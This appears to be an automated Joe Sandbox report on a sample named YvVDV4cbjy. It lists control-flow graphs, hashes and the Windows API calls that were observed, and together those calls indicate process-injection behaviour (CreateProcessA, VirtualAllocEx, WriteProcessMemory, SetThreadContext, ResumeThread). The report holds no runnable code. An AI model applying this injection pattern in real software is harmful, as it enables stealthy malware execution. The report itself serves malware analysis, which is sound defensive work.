                              • Instruction ID: 4a7e99f12944b5de81d69343c166f9ec7afd4c7b8f9c08bdf48ade99ae911904
                              • Opcode Fuzzy Hash: 0cc4b2065816405e7fc200f1cc006a00a098eec398dcf1169a815aeadd70ebf7
                              • Instruction Fuzzy Hash: F3611AB1D59219CFDB24CF66C8447E9FBB6BF8A300F14C1AAD51CA6250EB706A85CF40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 396 77baf40-77baf42 397 77baf4b-77bafb2 PostMessageW 396->397 398 77baf44-77baf45 396->398 399 77bafbb-77bafcf 397->399 400 77bafb4-77bafba 397->400 398->397 400->399
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BAFA5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID: V
                              • API String ID: 410705778-1342839628
                              • Opcode ID: 7e0eca9cd2dbfd9f1869c1a7748178235e7fc5f1e2fc3e395468a9bd845fe675
                              • Instruction ID: 4c0b6c457f83960bac064e8dbe93fe687478c82a9bc4bc6f3e79b586441506a5
                              • Opcode Fuzzy Hash: 7e0eca9cd2dbfd9f1869c1a7748178235e7fc5f1e2fc3e395468a9bd845fe675
                              • Instruction Fuzzy Hash: BE11F2F5800349DFDB20DF99C589BDEBBF8EB48350F20885AE518A3210C379A584CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 440 77b6bac-77b6bae 441 77b6bb0-77b6bb2 440->441 442 77b6bb7 440->442 443 77b6bbb-77b6c4d 441->443 444 77b6bb4 441->444 442->443 449 77b6c4f-77b6c59 443->449 450 77b6c86-77b6ca6 443->450 445 77b6b76-77b6b7d call 77b6b82 444->445 446 77b6bb6 444->446 445->440 446->442 449->450 451 77b6c5b-77b6c5d 449->451 455 77b6ca8-77b6cb2 450->455 456 77b6cdf-77b6d0e 450->456 453 77b6c5f-77b6c69 451->453 454 77b6c80-77b6c83 451->454 457 77b6c6b 453->457 458 77b6c6d-77b6c7c 453->458 454->450 455->456 459 77b6cb4-77b6cb6 455->459 466 77b6d10-77b6d1a 456->466 467 77b6d47-77b6d9f 456->467 457->458 458->458 460 77b6c7e 458->460 461 77b6cd9-77b6cdc 459->461 462 77b6cb8-77b6cc2 459->462 460->454 461->456 464 77b6cc6-77b6cd5 462->464 465 77b6cc4 462->465 464->464 468 77b6cd7 464->468 465->464 466->467 469 77b6d1c-77b6d1e 466->469 477 77b6da6-77b6e01 CreateProcessA 467->477 468->461 471 77b6d41-77b6d44 469->471 472 77b6d20-77b6d2a 469->472 471->467 473 77b6d2e-77b6d3d 472->473 474 77b6d2c 472->474 473->473 475 77b6d3f 473->475 474->473 475->471 478 77b6e0a-77b6e90 477->478 479 77b6e03-77b6e09 477->479 489 77b6e92-77b6e96 478->489 490 77b6ea0-77b6ea4 478->490 479->478 489->490 491 77b6e98 489->491 492 77b6ea6-77b6eaa 490->492 493 77b6eb4-77b6eb8 490->493 491->490 492->493 496 77b6eac 492->496 494 77b6eba-77b6ebe 493->494 495 77b6ec8-77b6ecc 493->495 494->495 497 77b6ec0 494->497 498 77b6ede-77b6ee5 495->498 499 77b6ece-77b6ed4 495->499 496->493 497->495 500 77b6efc 498->500 501 77b6ee7-77b6ef6 498->501 499->498 503 77b6efd 500->503 501->500 503->503
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077B6DEE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: fb15f981bdcd39654707e8edce36cec9cef8061f0bf340c429b00df20b4368da
                              • Instruction ID: 064918f8fea28ff6b00e71ddecc053b0ddd975a51f4513d7d882117696d22608
                              • Opcode Fuzzy Hash: fb15f981bdcd39654707e8edce36cec9cef8061f0bf340c429b00df20b4368da
                              • Instruction Fuzzy Hash: 8BA15BB1D0021ACFDB20CFA8C9847EDBBB2BF48354F1485A9D908E7240DB759985CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 504 77b6bb8-77b6c4d 507 77b6c4f-77b6c59 504->507 508 77b6c86-77b6ca6 504->508 507->508 509 77b6c5b-77b6c5d 507->509 513 77b6ca8-77b6cb2 508->513 514 77b6cdf-77b6d0e 508->514 511 77b6c5f-77b6c69 509->511 512 77b6c80-77b6c83 509->512 515 77b6c6b 511->515 516 77b6c6d-77b6c7c 511->516 512->508 513->514 517 77b6cb4-77b6cb6 513->517 524 77b6d10-77b6d1a 514->524 525 77b6d47-77b6e01 CreateProcessA 514->525 515->516 516->516 518 77b6c7e 516->518 519 77b6cd9-77b6cdc 517->519 520 77b6cb8-77b6cc2 517->520 518->512 519->514 522 77b6cc6-77b6cd5 520->522 523 77b6cc4 520->523 522->522 526 77b6cd7 522->526 523->522 524->525 527 77b6d1c-77b6d1e 524->527 536 77b6e0a-77b6e90 525->536 537 77b6e03-77b6e09 525->537 526->519 529 77b6d41-77b6d44 527->529 530 77b6d20-77b6d2a 527->530 529->525 531 77b6d2e-77b6d3d 530->531 532 77b6d2c 530->532 531->531 533 77b6d3f 531->533 532->531 533->529 547 77b6e92-77b6e96 536->547 548 77b6ea0-77b6ea4 536->548 537->536 547->548 549 77b6e98 547->549 550 77b6ea6-77b6eaa 548->550 551 77b6eb4-77b6eb8 548->551 549->548 550->551 554 77b6eac 550->554 552 77b6eba-77b6ebe 551->552 553 77b6ec8-77b6ecc 551->553 552->553 555 77b6ec0 552->555 556 77b6ede-77b6ee5 553->556 557 77b6ece-77b6ed4 553->557 554->551 555->553 558 77b6efc 556->558 559 77b6ee7-77b6ef6 556->559 557->556 561 77b6efd 558->561 559->558 561->561
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077B6DEE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 074a56bc38aeb34818ae3fbcc1d781f4db8990facd59cda938bfba677b1aa467
                              • Instruction ID: 6057ec1447023467342d0436d0811ecf416ed18ffbbd4de4312344d37c8eb83a
                              • Opcode Fuzzy Hash: 074a56bc38aeb34818ae3fbcc1d781f4db8990facd59cda938bfba677b1aa467
                              • Instruction Fuzzy Hash: 1A914AB1D0021ACFDB20CFA8C8447EDBBB2BF48354F1485A9D908E7250DB75A985CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 562 13cb1c8-13cb1d7 563 13cb1d9-13cb1e6 call 13c9c38 562->563 564 13cb203-13cb207 562->564 571 13cb1fc 563->571 572 13cb1e8 563->572 566 13cb209-13cb213 564->566 567 13cb21b-13cb25c 564->567 566->567 573 13cb25e-13cb266 567->573 574 13cb269-13cb277 567->574 571->564 617 13cb1ee call 13cb460 572->617 618 13cb1ee call 13cb450 572->618 573->574 575 13cb279-13cb27e 574->575 576 13cb29b-13cb29d 574->576 578 13cb289 575->578 579 13cb280-13cb287 call 13cae80 575->579 581 13cb2a0-13cb2a7 576->581 577 13cb1f4-13cb1f6 577->571 580 13cb338-13cb3f8 577->580 585 13cb28b-13cb299 578->585 579->585 612 13cb3fa-13cb3fd 580->612 613 13cb400-13cb42b GetModuleHandleW 580->613 582 13cb2a9-13cb2b1 581->582 583 13cb2b4-13cb2bb 581->583 582->583 586 13cb2bd-13cb2c5 583->586 587 13cb2c8-13cb2d1 call 13cae90 583->587 585->581 586->587 593 13cb2de-13cb2e3 587->593 594 13cb2d3-13cb2db 587->594 595 13cb2e5-13cb2ec 593->595 596 13cb301-13cb30e 593->596 594->593 595->596 598 13cb2ee-13cb2fe call 13caea0 call 13caeb0 595->598 602 13cb310-13cb32e 596->602 603 13cb331-13cb337 596->603 598->596 602->603 612->613 614 13cb42d-13cb433 613->614 615 13cb434-13cb448 613->615 614->615 617->577 618->577
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 013CB41E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 41ff9a797670afa2ec1edceb22f992b333da9a63c503f7866868252868a7209b
                              • Instruction ID: ae8faa9dcf6d8e1ba9df13fd0cd6399cf3d39b113ab779f58e221db214987627
                              • Opcode Fuzzy Hash: 41ff9a797670afa2ec1edceb22f992b333da9a63c503f7866868252868a7209b
                              • Instruction Fuzzy Hash: 1C714670A00B098FD724DF6AD44579ABBF6FF88748F00892DD48AD7A54DB35E809CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 729 13c590c-13c5913 730 13c5918-13c59d9 CreateActCtxA 729->730 732 13c59db-13c59e1 730->732 733 13c59e2-13c5a3c 730->733 732->733 740 13c5a3e-13c5a41 733->740 741 13c5a4b-13c5a4f 733->741 740->741 742 13c5a60 741->742 743 13c5a51-13c5a5d 741->743 745 13c5a61 742->745 743->742 745->745
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 81d8438b0ff53f7a8ffb1d29790e42603659c88588746808a705d349c7a662e1
                              • Instruction ID: 6855a95e5dec18f18952357dc7a8774f065b523b986bbc4ab035ab8b00b41f38
                              • Opcode Fuzzy Hash: 81d8438b0ff53f7a8ffb1d29790e42603659c88588746808a705d349c7a662e1
                              • Instruction Fuzzy Hash: CA4113B0D00719CBDB25CFAAC884BCEBBB5BF49704F20805AD408AB250DBB56946CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 746 13c44b0-13c59d9 CreateActCtxA 749 13c59db-13c59e1 746->749 750 13c59e2-13c5a3c 746->750 749->750 757 13c5a3e-13c5a41 750->757 758 13c5a4b-13c5a4f 750->758 757->758 759 13c5a60 758->759 760 13c5a51-13c5a5d 758->760 762 13c5a61 759->762 760->759 762->762
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: 34150a58d1ca6e053971450f46553d3b85b6e170749314f23bceaf01b041767f
                              • Instruction ID: bb4e12429454b3a7a363339a3e5d4ff26793cc0de511801f6e7e65be9a790cd6
                              • Opcode Fuzzy Hash: 34150a58d1ca6e053971450f46553d3b85b6e170749314f23bceaf01b041767f
                              • Instruction Fuzzy Hash: 3141F2B0D0071DCBDB25DFAAC884BDDBBB5BF49704F20806AD408AB255DBB56945CF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 763 77b6248-77b624a 764 77b624c-77b6252 763->764 765 77b6253-77b6254 763->765 764->765 766 77b625b-77b627f 764->766 767 77b62a6-77b631f ResumeThread 765->767 768 77b6256-77b6257 765->768 771 77b6281 766->771 772 77b6286-77b6289 766->772 775 77b6328-77b634d 767->775 776 77b6321-77b6327 767->776 768->766 771->772 774 77b6291-77b629a 772->774 776->775
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0bfee8a4c58aa8c5ebf69bc605f01cca2542bf6c7ed3d8a71a8011b1cd08e365
                              • Instruction ID: 4bcba04aeaba21a5965ddda607d50bffaae0ea33738c9d8f706454a11bb05a7c
                              • Opcode Fuzzy Hash: 0bfee8a4c58aa8c5ebf69bc605f01cca2542bf6c7ed3d8a71a8011b1cd08e365
                              • Instruction Fuzzy Hash: 7731A9B5D002898FCB21DFA9C9453DEBFF5AF49324F2084AAC518EB290D7389945CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 780 77b6929-77b692a 781 77b692c-77b6932 780->781 782 77b6933-77b697e 780->782 781->782 784 77b698e-77b69cd WriteProcessMemory 782->784 785 77b6980-77b698c 782->785 787 77b69cf-77b69d5 784->787 788 77b69d6-77b6a06 784->788 785->784 787->788
                              APIs
                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077B69C0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 2e26db1905776d8eb93bcb91ba00c48971b4f891cf96de9aa1ba3bf8870396e7
                              • Instruction ID: 6d62c4e76a75de056cbae20dd1f50adfa5f2d5a19186babba3183ca1e0c15fb6
                              • Opcode Fuzzy Hash: 2e26db1905776d8eb93bcb91ba00c48971b4f891cf96de9aa1ba3bf8870396e7
                              • Instruction Fuzzy Hash: 982146B5D002599FCB10DFA9C884BEEBBF1FF48350F10882AE919A7240C7789944CBA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 792 77b6930-77b697e 795 77b698e-77b69cd WriteProcessMemory 792->795 796 77b6980-77b698c 792->796 798 77b69cf-77b69d5 795->798 799 77b69d6-77b6a06 795->799 796->795 798->799
                              APIs
                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077B69C0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 05788f4e3c2cc41492484d7761314d8dfe0a24379cb6975c19460f9eacce6ec6
                              • Instruction ID: fd6378ea6c72c20cd88511eb3473d9adee157704cff8af08d3f9222ac92f3ab0
                              • Opcode Fuzzy Hash: 05788f4e3c2cc41492484d7761314d8dfe0a24379cb6975c19460f9eacce6ec6
                              • Instruction Fuzzy Hash: 2D2139B5900359DFCB10DFA9C885BEEBBF5FF48350F10882AE959A7240C7789944CBA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B63DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 87ad3aca44f95c2764cfe479ed2c0b3d19ddd84bcc2d2aff7d88f177f185f9e4
                              • Instruction ID: 2f9794d9e5eaf2f08a635cf06f190b1dd0a50074b90e9ff59324c87079a04d4e
                              • Opcode Fuzzy Hash: 87ad3aca44f95c2764cfe479ed2c0b3d19ddd84bcc2d2aff7d88f177f185f9e4
                              • Instruction Fuzzy Hash: 502135B5D002098FDB20DFAAC4857EEBBF5EF88354F14842AD519A7240CB789945CFA0
                              APIs
                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077B6AA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 4a5b366e06d9d0b535c190be9d14cb4824d9652ce3152071c382c6795e69333b
                              • Instruction ID: bc23f4a4fb3a80e48043d1f2ae53f87cab4cb22cf8586f06a03a0154a2ac16e0
                              • Opcode Fuzzy Hash: 4a5b366e06d9d0b535c190be9d14cb4824d9652ce3152071c382c6795e69333b
                              • Instruction Fuzzy Hash: C12125B1D002499FCB10DFAAC884AEEFBF1FF48310F10842AE519A7250D7389941CBA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 803 13cb0b4-13cd73c DuplicateHandle 805 13cd73e-13cd744 803->805 806 13cd745-13cd762 803->806 805->806
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD66E,?,?,?,?,?), ref: 013CD72F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: dc0ed7e4630486ddc9a107c57656571bc42cdd3a862c795b8d98179394d14bef
                              • Instruction ID: 676fae89e70461967b32e00cde486033b87bad1b4ccae0d1e3a4b9b52a715d6b
                              • Opcode Fuzzy Hash: dc0ed7e4630486ddc9a107c57656571bc42cdd3a862c795b8d98179394d14bef
                              • Instruction Fuzzy Hash: F421E5B59002489FDB10DF9AD584ADEBBF9EB48710F14841AE918A3310D378A954CFA5
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B63DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: 9e0c413ab1f1d4525c979284f08ed84bda12f6dbfede5b5c8a5f1c213da75cdc
                              • Instruction ID: 11a9167a33f952664e243d4e3dc0b6e16d57feb1758889454a316c4c072ff3f9
                              • Opcode Fuzzy Hash: 9e0c413ab1f1d4525c979284f08ed84bda12f6dbfede5b5c8a5f1c213da75cdc
                              • Instruction Fuzzy Hash: 8C2127B5D003098FDB10DFAAC4857EEBBF5EF48354F14842AD519A7241CB78A945CFA1
                              APIs
                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077B6AA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: ed6d0683ba1a0d88dac91534769efbb46e8303383c9a712b262e4313c800f249
                              • Instruction ID: 452979af95753f7d50a179ed925c33a51efb351109b3b1425ddc6ae4e7e5db95
                              • Opcode Fuzzy Hash: ed6d0683ba1a0d88dac91534769efbb46e8303383c9a712b262e4313c800f249
                              • Instruction Fuzzy Hash: 362125B1C002499FCB10DFAAC884AEEFBF5FF48310F50842AE919A7250C7389940CBA0
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD66E,?,?,?,?,?), ref: 013CD72F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: 2b67ad806b7954615005aa22d80023b9a1e99a43bce55670258689f1ec5c6c92
                              • Instruction ID: a980ec4362d1e58c005315357341e038c83efb950dea50bcff07589b47933302
                              • Opcode Fuzzy Hash: 2b67ad806b7954615005aa22d80023b9a1e99a43bce55670258689f1ec5c6c92
                              • Instruction Fuzzy Hash: DA21C4B5900249DFDB10CF99D584AEEBBF5FB48714F14841AE918B3350D378A944CFA5
                              APIs
                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077B68DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 9d16a353aabd845504cde2314d49a0d743dfd0cb088d9b04c9e1a7433755010a
                              • Instruction ID: b4c3440cb7e2f9a3a2432ac047e6551d94bc81c69e198b5915cac05bd8761672
                              • Opcode Fuzzy Hash: 9d16a353aabd845504cde2314d49a0d743dfd0cb088d9b04c9e1a7433755010a
                              • Instruction Fuzzy Hash: DF113AB5900249DFDB20DFA9C8447EEBFF5EF48314F14882AE519A7250C7399955CFA0
                              APIs
                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077B68DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 206ecf6ea70349434c67a35253476685bf86552fb4e1ff2e2a24f007d97d449b
                              • Instruction ID: 6bef020dd4e7c3d148166cd24085c1928d4b32d2b6ac00fb05dab647ad4d109c
                              • Opcode Fuzzy Hash: 206ecf6ea70349434c67a35253476685bf86552fb4e1ff2e2a24f007d97d449b
                              • Instruction Fuzzy Hash: B61126B5800249DFCB20DFAAC844AEEBBF5EF48310F108829E519A7250CB79A540CBA0
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: d31a5d5c431bb9a19dbd970457281384891e1523da4cdb165af0117b777ca997
                              • Instruction ID: 93b0ec61c9facdcd6204d2da0b0a5c2b462fff3b159b09bd24bc5cc6a457bc94
                              • Opcode Fuzzy Hash: d31a5d5c431bb9a19dbd970457281384891e1523da4cdb165af0117b777ca997
                              • Instruction Fuzzy Hash: DD1136B1D003498FDB20DFAAC4457EEFBF5EF88324F208819D519A7240CB79A944CBA0
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BAFA5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 7c15ea48cccd1ac94002bbbbc2f1393042b19f19019979d6705d1522613439d5
                              • Instruction ID: 5d2fbdf35f5c778b2511f0860e9b3d6b1534ff2cc9c44e4f21d19f123919d755
                              • Opcode Fuzzy Hash: 7c15ea48cccd1ac94002bbbbc2f1393042b19f19019979d6705d1522613439d5
                              • Instruction Fuzzy Hash: 201103B5800349DFDB20DF9AC488BDEFBF8EB48310F10845AE918A7200C379A944CFA1
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 013CB41E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 6b166d704646f1657ade028b9e68af28f904eb6c6565ac3868fdb30bf5f3f154
                              • Instruction ID: 914eed030531bbabe6cd6dd46a6c82d8e2c348c89e1fdd8be43c7a20ce938f3a
                              • Opcode Fuzzy Hash: 6b166d704646f1657ade028b9e68af28f904eb6c6565ac3868fdb30bf5f3f154
                              • Instruction Fuzzy Hash: 4F1110B5C002498FDB10DF9AD444ADEFBF8EF88714F10841AD519B7214C379A545CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 00c0525d6b6d75578dc328f807663ee2597f4ab5d96e679103e8e0c7fa228969
                              • Instruction ID: 5523a0c00389ef84ed33c728122a9eb305d5d3e13151d1ff586cb58e98102a23
                              • Opcode Fuzzy Hash: 00c0525d6b6d75578dc328f807663ee2597f4ab5d96e679103e8e0c7fa228969
                              • Instruction Fuzzy Hash: 3C214871200244DFDB06DF58D9C0F56BF6DFB98318F20C169D9491B25AC73AE816C7A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 03e14d3c2e5a96d520bc961ceef3c72a86e6c593c58836f85a0693c915dc1896
                              • Instruction ID: 7a0fb1cd61b50b0280a9e6f1256f29ff5f8095368de39948ff31881d8c68ca93
                              • Opcode Fuzzy Hash: 03e14d3c2e5a96d520bc961ceef3c72a86e6c593c58836f85a0693c915dc1896
                              • Instruction Fuzzy Hash: 7A21F571604204DFDB25DF98D5C0B26BB65FF84328F24C56DD9494B256C33ED407CA61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9887e417ffb61b68698665632e8171d5b36e35b144686ce566c46d05094b8b93
                              • Instruction ID: 375dedf31a563e5e4581c60960235072a1c26f71c3874dc21cbadb92ba89b9e5
                              • Opcode Fuzzy Hash: 9887e417ffb61b68698665632e8171d5b36e35b144686ce566c46d05094b8b93
                              • Instruction Fuzzy Hash: A8210071604204DFCB26DF68D980B26BFA9FF88318F20C56DD90A0B256C33ED406CA61
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062979337.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_137d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9b595ff58d56e28363035bf502b84b8d57bf879c3a6cf6435799c7c1b133d988
                              • Instruction ID: 57de29a8492948793a4589566f5df037ea4212d36c1e9805858282d3f74b0bf1
                              • Opcode Fuzzy Hash: 9b595ff58d56e28363035bf502b84b8d57bf879c3a6cf6435799c7c1b133d988
                              • Instruction Fuzzy Hash: 8A216F755093808FDB13CF64D994715BF71EF46218F28C5EAD8498F6A7C33A980ACB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.2062860498.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_136d000_YvVDV4cbjy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                              • Instruction ID: 0ccd92be3b2db37e53e85d90ba3ce4bbae5d623437e3cc801333df9460f402a3
